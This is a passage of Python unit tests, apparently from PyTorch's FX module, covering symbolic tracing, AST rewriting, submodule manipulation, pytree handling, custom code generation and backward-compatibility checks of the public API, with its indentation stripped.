# manager without ensuring that the output is as expected
try:
traced(torch.rand(5, 5))
except RuntimeError:
captured = traceback.format_exc()
self.assertNotRegex(captured,
r"Call using an FX-traced Module, line .* of the "
r"traced Module's generated forward function:")
def test_graph_module_replicate_for_dp(self):
class Foo(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
gm = torch.fx.symbolic_trace(Foo())
x = torch.randn(5, 3)
out = gm(x)
replica = gm._replicate_for_data_parallel()
out_replica = replica(x)
torch.testing.assert_allclose(out_replica, out)
def test_ast_rewriter_rewrites_assert(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, y: int, z: int):
assert y == z
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_ast_rewriter_rewrites_assert_with_message(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, y: int, z: int):
assert y == z, "msg"
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_throw_out_variant(self):
def foo(x):
y = torch.rand_like(x)
torch.sigmoid(x, out=y)
return y
class MyTracer(torch.fx.Tracer):
check_mutable_operations = True
tracer = MyTracer()
with self.assertRaisesRegex(RuntimeError, 'mutable operation aten::sigmoid.out'):
traced_graph = tracer.trace(foo)
def test_ast_rewriter_reassigns_submodules(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.bn = torch.nn.BatchNorm2d(100)
def forward(self, x: torch.Tensor):
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_ast_rewriter_wrap(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf((3, 4), 5))
def to_trace(y):
return (
a_lifted_leaf((4, y), 3)
+ a_lifted_leaf((3, 4), 5)
+ a_lifted_leaf((y, y), y)
)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(to_trace)
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("a_lifted_leaf", traced.code)
self.assertEqual(27, traced(2))
self.assertIs(a_lifted_leaf, real_a_lifed_leaf)
def test_ast_rewriter_wrap_fn_directly(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf2((3, 4), 5))
def to_trace(y):
return (
a_lifted_leaf2((4, y), 3)
+ a_lifted_leaf2((3, 4), 5)
+ a_lifted_leaf2((y, y), y)
)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(to_trace)
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("a_lifted_leaf2", traced.code)
self.assertEqual(27, traced(2))
self.assertIs(a_lifted_leaf2, real_a_lifed_leaf2)
def test_profiler_ranges_side_effect(self):
g = torch.fx.Graph()
handle = g.call_function(torch.ops.profiler._record_function_enter, ('test_range',))
g.call_function(torch.ops.profiler._record_function_exit, (handle,))
g.output(None)
found_targets = {}
for node in g.nodes:
if node.op == 'call_function':
found_targets.setdefault(node.target)
self.assertEqual(
list(found_targets.keys()),
[torch.ops.profiler._record_function_enter, torch.ops.profiler._record_function_exit]
)
g.eliminate_dead_code()
found_targets = {}
for node in g.nodes:
if node.op == 'call_function':
found_targets.setdefault(node.target)
self.assertEqual(
list(found_targets.keys()),
[torch.ops.profiler._record_function_enter, torch.ops.profiler._record_function_exit]
)
def test_ast_rewriter_wrapped_via_decorator(self):
class F(torch.nn.Module):
def forward(self, x):
return wrapped_via_decorator(x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(F())
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("wrapped_via_decorator", traced.code)
self.assertEqual(traced(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_ast_rewriter_wrapped_via_decorator_and_transformed(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(to_trace)
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("wrapped_via_decorator", traced.code)
self.assertEqual(traced(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
transformed = torch.fx.Transformer(traced).transform()
self.assertIn("wrapped_via_decorator", transformed.code)
self.assertEqual(transformed(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_ast_rewriter_wrap_with_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
def forward(self, x: torch.Tensor):
return wrapped_with_submodule(x, self.batchnorm1d)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("wrapped_with_submodule", traced.code)
input = torch.rand(3, 2)
ref_batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
self.assertEqual(ref_batchnorm1d(input), traced(input))
def test_submodule_manipulation_API(self):
class C(torch.nn.Module):
def __init__(self):
super(C, self).__init__()
self.conv = torch.nn.Conv2d(16, 33, 3, stride=2)
self.param = torch.nn.Parameter(torch.rand(2, 3))
def forward(self, x):
return self.conv(torch.cat([self.param, x]))
class B(torch.nn.Module):
def __init__(self):
super(B, self).__init__()
self.linear = torch.nn.Linear(100, 200)
self.register_buffer("buf", torch.randn(2, 3))
self.net_c = C()
def forward(self, x):
return self.linear(torch.cat([self.buf, self.net_c(x)]))
class A(torch.nn.Module):
def __init__(self):
super(A, self).__init__()
self.net_b = B()
self.param = torch.nn.Parameter(torch.rand(2, 3))
def forward(self, x):
return self.net_b(x) + self.param
a = symbolic_trace(A())
a.add_submodule("net_b.net_c.dropout", torch.nn.Dropout(p=0.2))
conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"][-1]
with a.graph.inserting_before(conv):
with warnings.catch_warnings(record=True) as w:
dropout = a.graph.call_module(module_name="net_b.net_c.dropout",
args=conv.args)
self.assertEqual(len(w), 0)
conv.replace_all_uses_with(dropout)
a.graph.erase_node(conv)
a.recompile()
def module_exists(gm: GraphModule, path: str) -> bool:
return any(path == name for name, _ in gm.named_modules())
def parameter_exists(gm: GraphModule, path: str) -> bool:
return (any(path == name for name, _ in gm.named_parameters())
and any(path == name for name in gm.state_dict().keys()))
def buffer_exists(gm: GraphModule, path: str) -> bool:
return (any(path == name for name, _ in gm.named_buffers())
and any(path == name for name in gm.state_dict().keys()))
# Test that we added the "dropout" submodule
self.assertTrue(module_exists(a, "net_b.net_c.dropout"))
# Test `get_submodule` with an added submodule
self.assertIsNotNone(a.get_submodule("net_b.net_c.dropout"))
# Test that the "conv" submodule is still there
self.assertTrue(module_exists(a, "net_b.net_c.conv"))
# Test `get_submodule` with an original module
self.assertIsNotNone(a.get_submodule("net_b.net_c.conv"))
# Test that the "conv" node is NOT still there
conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"]
self.assertEqual(conv, [])
a.delete_submodule("net_b.net_c.conv")
# Test that the "conv" submodule is now gone
self.assertFalse(module_exists(a, "net_b.net_c.conv"))
# Test `get_submodule` with a deleted submodule
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`conv`"):
self.assertIsNone(a.get_submodule("net_b.net_c.conv"))
# Test `get_attr` warnings
cat = [n for n in a.graph.nodes if n.target == torch.cat][-1]
with a.graph.inserting_before(cat):
with warnings.catch_warnings(record=True) as w:
param = a.graph.get_attr(qualified_name="net_b.net_c.param")
self.assertEqual(len(w), 0)
with self.assertWarnsRegex(UserWarning, "Attempted to "
"insert a get_attr Node with no "
"underlying reference in the "
"owning GraphModule"):
bad_param = a.graph.get_attr(qualified_name="net_b.param")
a.graph.erase_node(bad_param)
cat.args = (*cat.args, param)
a.recompile()
a.graph.lint()
# Test `get_parameter`
a.get_parameter("net_b.net_c.param")
with self.assertRaisesRegex(AttributeError, "is not an "
"nn.Parameter"):
a.get_parameter("net_b.buf")
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`param`"):
a.get_parameter("net_b.param")
# Test `get_buffer`
a.get_buffer("net_b.buf")
with self.assertRaisesRegex(AttributeError, "is not a "
"buffer"):
a.get_buffer("net_b.net_c.param")
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`buf`"):
a.get_buffer("net_b.net_c.buf")
# Test non-nested attributes
a.get_submodule("")
a.get_parameter("param")
# Insert some unused submodules
a.add_submodule("net_b.embedding", torch.nn.Embedding(10, 3))
a.add_submodule("net_b.net_c.embedding", torch.nn.Embedding(10, 3))
a.add_submodule("net_b.net_c.rnn", torch.nn.RNN(10, 20, 2))
a.add_submodule("batch_norm_2d", torch.nn.BatchNorm2d(100))
# Garbage collection
a.delete_all_unused_submodules()
# Test that all the unused submodules are gone
self.assertFalse(module_exists(a, "net_b.embedding"))
self.assertFalse(module_exists(a, "net_b.net_c.embedding"))
self.assertFalse(module_exists(a, "net_b.net_c.rnn"))
self.assertFalse(module_exists(a, "batch_norm_2d"))
# Test that we didn't delete any unused Parameters or buffers
self.assertTrue(parameter_exists(a, "net_b.net_c.param"))
self.assertTrue(buffer_exists(a, "net_b.buf"))
a.graph.lint()
def test_delete_unused_submodules_leaf(self):
class SubModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.linear = torch.nn.Linear(10, 10)
self.relu = torch.nn.ReLU()
def forward(self, x):
x = self.linear(x)
x = self.relu(x)
return x
class Model(torch.nn.Module):
def __init__(self):
super().__init__()
self.submod = SubModule()
def forward(self, x):
x = self.submod(x)
return x
model = Model()
class MyCustomTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return module_qualified_name == "submod"
inputs = torch.randn(1, 10)
traced_graph = MyCustomTracer().trace(model)
gm2 = torch.fx.GraphModule(model, traced_graph)
gm2.delete_all_unused_submodules()
torch.testing.assert_allclose(gm2(inputs), model(inputs))
def test_tracing_graphmodules_as_leaf_submodules(self):
class A(torch.nn.Module):
def forward(self, t):
return t + t
class B(torch.nn.Module):
def __init__(self):
super(type(self), self).__init__()
self.calling = False
self.called = False
def forward(self, t):
if self.calling:
return t - t
else:
return t + t
def __call__(self, *args):
self.called = True
self.calling = True
return super(type(self), self).__call__(*args)
self.calling = False
class M(torch.nn.Module):
def __init__(self, a, b):
super().__init__()
self.a = a
self.b = b
def forward(self, t):
x = self.a(t)
y = self.b(t)
return x + y
class LeafTracer(Tracer):
def is_leaf_module(self, module, name):
return True
class LeafTracerNotB(Tracer):
def is_leaf_module(self, module, name):
return False if "b" in name else True
# Recompile calls added "for fun", since they
# chain __call__ wrappers.
#
# Test: B as a regular, non-leaf module
#
a = symbolic_trace(A())
a.recompile()
m = M(a, B())
graph = LeafTracerNotB().trace(m)
gm = GraphModule(m, graph)
gm.recompile()
# Test graphmodule/submodule a is not inlined.
self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
self.assertTrue(len(match) == 1)
# Test submodule b is not treated as leaf.
self.assertFalse(hasattr(gm, "b"))
# Test assert custom __call__ on submodule b was honored.
match = [
n
for n in gm.graph.nodes
if n.op == "call_function" and n.target == operator.sub
]
self.assertTrue(len(match) == 1)
#
# Test: B as a regular, leaf module
# symbolic_trace should only patch torch.nn.Module.__call__,
# which means B.__call__ should still execute
#
a = symbolic_trace(A())
a.recompile()
b = B()
m = M(a, b)
graph = LeafTracer().trace(m)
gm = GraphModule(m, graph)
gm.recompile()
# Test graphmodule/submodule a is not inlined.
self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
self.assertTrue(len(match) == 1)
# Test submodule b is leaf:
self.assertTrue(isinstance(gm.get_submodule("b"), torch.nn.Module))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "b"]
self.assertTrue(len(match) == 1)
# Test b.__call__ was run
self.assertTrue(b.called)
self.assertTrue(gm.get_submodule("b").called)
#
# Test: B as GraphModule leaf
# __call__ not honored since symbolic_trace directly invokes forward()
#
a = symbolic_trace(A())
a.recompile()
b = symbolic_trace(B())
b.recompile()
m = M(a, b)
graph = LeafTracer().trace(m)
gm = GraphModule(m, graph)
gm.recompile()
self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
self.assertTrue(len(match) == 1)
self.assertTrue(isinstance(gm.get_submodule("b"), torch.nn.Module))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "b"]
self.assertTrue(len(match) == 1)
def _test_graph_module_init_buffer_param_copied(self, use_dict_init: bool):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.register_buffer("my_buff", torch.rand(3, 4))
self.register_parameter(
"my_param", torch.nn.Parameter(torch.rand(3, 4))
)
def forward(self, x):
return x + self.my_buff + self.my_param
mod = MyModule()
mod_traced = symbolic_trace(mod)
# Create new GraphModule based on original, either w/ dict or root module.
orig_buff = mod_traced.get_buffer("my_buff")
orig_param = mod_traced.get_parameter("my_param")
mod_traced_new = GraphModule(
{"my_buff": orig_buff, "my_param": orig_param} if use_dict_init else mod,
mod_traced.graph,
)
# Check that both my_buff and my_param are found and the same.
try:
new_buff = mod_traced_new.get_buffer("my_buff")
except Exception:
self.fail("Did not find my_buff")
self.assertEqual(orig_buff, new_buff)
try:
new_param = mod_traced_new.get_parameter("my_param")
except Exception:
self.fail("Did not find my_param")
self.assertEqual(orig_param, new_param)
x = torch.rand(3, 4)
orig_out = mod_traced(x)
submodules_out = mod_traced_new(x)
self.assertEqual(orig_out, submodules_out)
def test_graph_module_init_buffer_param_copied_dict_init(self):
self._test_graph_module_init_buffer_param_copied(use_dict_init=True)
def test_graph_module_init_buffer_param_copied_mod_init(self):
self._test_graph_module_init_buffer_param_copied(use_dict_init=False)
def test_annotations_with_no_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, a: A) -> torch.Tensor:
return a(x)
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: 'torch.Tensor', a: 'A') -> 'torch.Tensor':
return a(x)
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_non_torch_reference_and_no_internal_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: List[torch.Tensor], a: A) -> torch.Tensor:
return a(x[0])
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_non_torch_reference_and_internal_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: List['torch.Tensor'], a: A) -> 'torch.Tensor':
return a(x)[0]
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
@unittest.skipIf(sys.version_info < (3, 7), "`__future__` feature "
"`annotations` is not defined in Python <3.7")
def test_annotation_with_future(self):
try:
import fx.test_future # noqa: F401
finally:
del sys.modules["__future__"]
def test_annotations_empty_tuple(self):
class Foo(torch.nn.Module):
def forward(self, x: Tuple[()], y: Tuple[str, Tuple[()]]):
return "foo"
traced = torch.fx.symbolic_trace(Foo())
x = ()
y = ("bar", ())
traced(x, y)
FileCheck().check("_Tuple[()]") \
.check("typing_Tuple[str,typing_Tuple[()]]") \
.run(traced.code)
scripted = torch.jit.script(traced)
scripted(x, y)
FileCheck().check("Tuple[()]") \
.check("Tuple[str, Tuple[()]]") \
.run(scripted.code)
@unittest.skipIf(IS_WINDOWS, "Python Windows bug? https://bugs.python.org/issue45108")
def test_assert(self):
def f(x):
assert x > 1
return x + 1
try:
torch.fx.proxy.TracerBase.trace_asserts = True
traced = symbolic_trace(f)
finally:
torch.fx.proxy.TracerBase.trace_asserts = False
self.assertEqual(f(2), traced(2))
with self.assertRaises(AssertionError):
traced(0)
def test_pytree(self):
def f_sum(x):
return sum(x)
def f_sum_dict(x):
out = 0
for k, v in x.items():
out += v
return out
def f_dict_list_map(x):
new_dict = {}
for k, v in x.items():
new_dict[k] = [i + 1 for i in v]
return new_dict
def f_dict_add(x):
return x['a'] + sum(x['z'])
def f_namedtuple_add(x):
return x.x + x.y
pytree._register_pytree_node(
Foo,
lambda x: ([x.a, x.b], None),
lambda x, _: Foo(x[0], x[1]),
)
fx_pytree.register_pytree_flatten_spec(Foo, lambda x, _: [x.a, x.b])
def f_custom(x):
return x.a + x.b
def f_custom_dict(x):
return f_sum_dict(x.a) + x.b
def f_return_custom(x):
return Foo(x.b, x.a)
tests = [
(f_sum, [PH, PH, PH]),
(f_sum, []),
(f_sum_dict, {'a': PH, 'b': PH, 'c': PH}),
(f_dict_list_map, {'a': (PH, PH), 'b': [PH], 'c': []}),
(f_dict_list_map, {5: (PH, PH, PH)}),
(f_dict_add, {'a': PH, 'z': (PH, PH, PH)}),
(f_dict_add, {'a': PH, 'z': []}),
(f_custom, Foo(PH, PH)),
(f_custom, Foo(PH, 3)),
(f_custom_dict, Foo({'a': PH, 'b': PH}, PH)),
# (f_return_custom, Foo(PH, PH)), # Don't currently support output pytrees
(f_namedtuple_add, Point(PH, PH)),
]
def verify_pytree(f, inp):
val = pytree.tree_map(lambda x: torch.randn(3) if x == PH else x, inp)
num_flat_args = len([i == PH for i in pytree.tree_flatten(inp)[0]])
orig_out = f(val)
nf = symbolic_trace(f, concrete_args={'x': inp})
self.assertEqual(nf(val), orig_out)
bare_fx = GraphModule({}, copy.deepcopy(nf.graph))
bare_fx.graph.set_codegen(CodeGen())
bare_fx.recompile()
self.assertEqual(nf.graph.process_outputs(bare_fx(*nf.graph.process_inputs(val))), orig_out)
assert num_flat_args == 0 or "tree_flatten_spec" in nf.code
assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == num_flat_args)
nf = symbolic_trace(nf)
self.assertEqual(nf(val), orig_out)
assert "tree_flatten_spec" not in nf.code
assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == 1)
nf = symbolic_trace(nf, concrete_args={'x': inp})
self.assertEqual(nf(val), orig_out)
assert num_flat_args == 0 or "tree_flatten_spec" in nf.code
assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == num_flat_args)
pickled = pickle.dumps(nf)
nf = pickle.loads(pickled)
self.assertEqual(nf(val), orig_out)
for f, inp in tests:
verify_pytree(f, inp)
def test_pytree_concrete(self):
def f(b, a):
if b:
return a['a']
else:
return a['z']
inp = {'a': {'a': PH, 'z': PH}, 'b': True}
nf = symbolic_trace(f, concrete_args=inp)
val = pytree.tree_map(lambda x: torch.randn(3) if x == PH else x, inp)
self.assertEqual(nf(**val), f(**val))
nf = symbolic_trace(nf)
self.assertEqual(nf(**val), f(**val))
def test_custom_codegen(self):
class ListCodeGen(CodeGen):
def gen_fn_def(self, free_vars, maybe_return_annotation):
lst_unpack = f"""
def forward(self, args_list: List[torch.Tensor]){maybe_return_annotation}:
{', '.join(free_vars)} = args_list"""
return lst_unpack
def additional_globals(self):
return [('List', typing.List)]
def process_inputs(self, *inputs):
assert(len(inputs) == 1)
return inputs[0]
def f(a, b):
return a + b
nf = symbolic_trace(f)
vals = [torch.randn(3), torch.randn(3)]
self.assertEqual(nf(*vals), f(*vals))
nf.graph.set_codegen(ListCodeGen())
nf.recompile()
bare_fx = GraphModule({}, copy.deepcopy(nf.graph))
bare_fx.graph.set_codegen(CodeGen())
bare_fx.recompile()
self.assertEqual(nf(vals), f(*vals))
self.assertEqual(nf.graph.process_outputs(bare_fx(*nf.graph.process_inputs(vals))), f(*vals))
ts_f = torch.jit.script(nf)
self.assertEqual(nf(vals), ts_f(vals))
def test_imul_code_print(self):
graph = torch.fx.Graph()
a = graph.placeholder("a")
b = graph.placeholder("b")
graph.call_function(operator.imul, (a, b), {})
graph.output(a)
gm = torch.fx.GraphModule({}, graph)
gm.recompile()
self.assertEqual(gm(2, 3), 6)
self.assertIn("a *= b", gm.code)
def run_getitem_target():
from torch.fx._symbolic_trace import _wrapped_methods_to_patch
_wrapped_methods_to_patch.append((torch.Tensor, "__getitem__"))
try:
TestFX().getitem_inner()
finally:
_wrapped_methods_to_patch.pop()
class TestOperatorSignatures(JitTestCase):
def setUp(self):
# Checking for mutable operations whil tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
@onlyCPU
@ops(op_db, allowed_dtypes=(torch.float,))
def test_get_torch_func_signature_exhaustive(self, device, dtype, op):
if not isinstance(op.op, types.BuiltinFunctionType):
raise unittest.SkipTest("This path doesn't work on Python functions")
sample_inputs_itr = op.sample_inputs(device, dtype, requires_grad=False)
schemas = get_signature_for_torch_op(op.op)
if not schemas:
raise RuntimeError('No Schemas Returned')
for sample_input in sample_inputs_itr:
# Iterate through overloads until we hit a match. If we exit this
# loop via `else`, we haven't found a match
for schema in schemas:
try:
bound_args = schema.bind(sample_input.input, *sample_input.args, **sample_input.kwargs)
bound_args.apply_defaults()
op(*bound_args.args, **bound_args.kwargs)
break
except TypeError as e:
pass
else:
raise RuntimeError(f'Did not match any schemas for op {op.name}!')
class TestFXAPIBackwardCompatibility(JitTestCase):
def setUp(self):
self.maxDiff = None
# Checking for mutable operations whil tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
def _fn_to_stable_annotation_str(self, obj):
"""
Unfortunately we have to serialize function signatures manually since
serialization for `inspect.Signature` objects is not stable across
python versions
"""
fn_name = torch.typename(obj)
signature = inspect.signature(obj)
sig_str = f'{fn_name}{signature}'
arg_strs = []
for k, v in signature.parameters.items():
maybe_type_annotation = f': {self._annotation_type_to_stable_str(v.annotation, sig_str)}'\
if v.annotation is not inspect.Signature.empty else ''
def default_val_str(val):
if isinstance(val, (tuple, list)):
str_pieces = ['(' if isinstance(val, tuple) else '[']
str_pieces.append(', '.join(default_val_str(v) for v in val))
if isinstance(val, tuple) and len(str_pieces) == 2:
str_pieces.append(',')
str_pieces.append(')' if isinstance(val, tuple) else ']')
return ''.join(str_pieces)
# Need to fix up some default value strings.
# First case: modules. Default module `repr` contains the FS path of the module.
# Don't leak that
if isinstance(val, types.ModuleType):
return f'<module {val.__name__}>'
# Second case: callables. Callables (such as lambdas) encode their address in
# their string repr. Don't do that
if callable(val):
return f'<function {val.__name__}>'
return str(val)
if v.default is not inspect.Signature.empty:
default_val_str = default_val_str(v.default) if not isinstance(v.default, str) else f"'{v.default}'"
maybe_default = f' = {default_val_str}'
else:
maybe_default = ''
maybe_stars = ''
if v.kind == inspect.Parameter.VAR_POSITIONAL:
maybe_stars = '*'
elif v.kind == inspect.Parameter.VAR_KEYWORD:
maybe_stars = '**'
arg_strs.append(f'{maybe_stars}{k}{maybe_type_annotation}{maybe_default}')
return_annot = f' -> {self._annotation_type_to_stable_str(signature.return_annotation, sig_str)}'\
if signature.return_annotation is not inspect.Signature.empty else ''
return f'{fn_name}({", ".join(arg_strs)}){return_annot}'
def _annotation_type_to_stable_str(self, t, sig_str):
if t is inspect.Signature.empty:
return ''
# Forward ref
if isinstance(t, str):
return f"'{t}'"
if hasattr(typing, 'ForwardRef') and isinstance(t, typing.ForwardRef):
return t.__forward_arg__
if hasattr(typing, '_ForwardRef') and isinstance(t, typing._ForwardRef):
return t.__forward_arg__
trivial_mappings = {
str : 'str',
int : 'int',
float: 'float',
bool: 'bool',
torch.dtype: 'torch.dtype',
torch.Tensor: 'torch.Tensor',
torch.device: 'torch.device',
torch.memory_format: 'torch.memory_format',
slice: 'slice',
torch.nn.Module: 'torch.nn.modules.module.Module',
torch.fx.Graph : 'torch.fx.graph.Graph',
torch.fx.Node : 'torch.fx.node.Node',
torch.fx.Proxy : 'torch.fx.proxy.Proxy',
torch.fx.node.Target : 'torch.fx.node.Target',
torch.fx.node.Argument : 'torch.fx.node.Argument',
torch.fx.graph.PythonCode : 'torch.fx.graph.PythonCode',
torch.fx.graph_module.GraphModule: 'torch.fx.graph_module.GraphModule',
torch.fx.subgraph_rewriter.Match: 'torch.fx.subgraph_rewriter.Match',
Ellipsis : '...',
typing.Any: 'Any',
type(None): 'NoneType',
None: 'None',
typing.Iterator: 'Iterator',
}
mapping = trivial_mappings.get(t, None)
if mapping:
return mapping
# Handle types with contained types
contained = getattr(t, '__args__', None) or []
# Callables contain a bare List for arguments
contained = t if isinstance(t, list) else contained
# Python 3.8 puts type vars into __args__ for unbound types such as Dict
if all(isinstance(ct, typing.TypeVar) for ct in contained):
contained = []
contained_type_annots = [self._annotation_type_to_stable_str(ct, sig_str) for ct in contained]
contained_type_str = f'[{", ".join(contained_type_annots)}]' if len(contained_type_annots) > 0 else ''
origin = getattr(t, '__origin__', None)
if origin is None:
# Unbound types don't have `__origin__` in some Python versions, so fix that up here.
origin = t if t in {typing.Tuple, typing.Union, typing.Dict, typing.List, typing.Type, typing.Callable} else origin
if origin in {tuple, typing.Tuple}:
return f'Tuple{contained_type_str}'
if origin in {typing.Union}:
# Annoying hack to detect Optional
if len(contained) == 2 and (contained[0] is type(None)) ^ (contained[1] is type(None)):
not_none_param = contained[0] if contained[0] is not type(None) else contained[1]
return f'Optional[{self._annotation_type_to_stable_str(not_none_param, sig_str)}]'
return f'Union{contained_type_str}'
if origin in {dict, typing.Dict}:
return f'Dict{contained_type_str}'
if origin in {list, typing.List}:
return f'List{contained_type_str}'
if origin in {type, typing.Type}:
return f'Type{contained_type_str}'
if isinstance(t, typing.Callable):
if len(contained) > 0 and contained[0] is not Ellipsis:
return f'Callable[[{", ".join(contained_type_annots[:-1])}], {contained_type_annots[-1]}]'
else:
return f'Callable{contained_type_str}'
raise RuntimeError(f'Unrecognized type {t} used in BC-compatible type signature {sig_str}.'
f'Please add support for this type and confirm with the '
f'FX team that your signature change is valid.')
def test_function_back_compat(self):
"""
Test backward compatibility for function signatures with
@compatibility(is_backward_compatible=True). Currently this checks for
exact signature matches, which may lead to false positives. If this
becomes too annoying, we can refine this check to actually parse out
the saved schema strings and check if the change is truly backward-
incompatible.
"""
signature_strs = []
for obj in _BACK_COMPAT_OBJECTS:
if not isinstance(obj, type):
signature_strs.append(self._fn_to_stable_annotation_str(obj))
signature_strs.sort()
try:
self.assertExpected('\n'.join(signature_strs), 'fx_backcompat_function_signatures')
except AssertionError as e:
msg = f"{e}\n****** ERROR ******\nAn FX function that has been marked " \
f"as backwards-compatible has experienced a signature change. See the " \
f"above exception context for more information. If this change was " \
f"unintended, please revert it. If it was intended, check with the FX " \
f"team to ensure that the proper deprecation protocols have been followed " \
f"and subsequently --accept the change."
raise AssertionError(msg)
def test_class_member_back_compat(self):
"""
Test backward compatibility for members of classes with
@compatibility(is_backward_compatible=True). Currently this checks for
exact matches on the publicly visible members of the class.
"""
class_method_strs = []
for obj in _BACK_COMPAT_OBJECTS:
if isinstance(obj, type):
public_members = [name for name in obj.__dict__ if not name.startswith('_')]
class_method_strs.append(f'{torch.typename(obj)} {sorted(public_members)}')
class_method_strs.sort()
try:
self.assertExpected('\n'.join(class_method_strs), 'fx_backcompat_class_members')
except AssertionError as e:
msg = f"{e}\n****** ERROR ******\nAn FX class that has been marked " \
f"as backwards-compatible has experienced change in its public members. See the " \
f"above exception context for more information. If this change was " \
f"unintended, please revert it. If it was intended, check with the FX " \
f"team to ensure that the proper deprecation protocols have been followed " \
f"and subsequently --accept the change."
raise AssertionError(msg)
def test_public_api_surface(self):
non_back_compat_objects = {}
def check_symbols_have_bc_designation(m, prefix):
if not m.__name__.startswith('torch.fx'):
return
if m.__name__.startswith('torch.fx.experimental'):
return
for k, v in m.__dict__.items():
if v is m:
continue
if k.startswith('_'):
continue
if isinstance(v, types.ModuleType):
check_symbols_have_bc_designation(v, prefix + [k])
elif isinstance(v, type) or isinstance(v, types.FunctionType):
if v not in _MARKED_WITH_COMATIBLITY:
non_back_compat_objects.setdefault(v)
check_symbols_have_bc_designation(torch.fx, ['torch', 'fx'])
check_symbols_have_bc_designation(torch.fx.passes, ['torch', 'fx', 'passes'])
non_back_compat_strs = [torch.typename(obj) for obj in non_back_compat_objects.keys()]
# Only want objects in torch.fx
non_back_compat_strs = [
s for s in non_back_compat_strs if s.startswith('torch.fx') and not s.startswith('torch.fx.experimental')]
# Only want objects in public namespaces
non_back_compat_strs = [
s for s in non_back_compat_strs if all(not atom.startswith('_') for atom in s.split('.'))]
non_back_compat_strs.sort()
if len(non_back_compat_strs) != 0:
raise AssertionError(f"Public FX API(s) {non_back_compat_strs} introduced but not given a "
f"backwards-compatibility classification! Please decorate these "
f"API(s) with `@torch.fx._compatibility.compatibility` to specify "
f"BC guarantees.")
class TestFunctionalTracing(JitTestCase):
def setUp(self):
# Checking for mutable operations whil tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
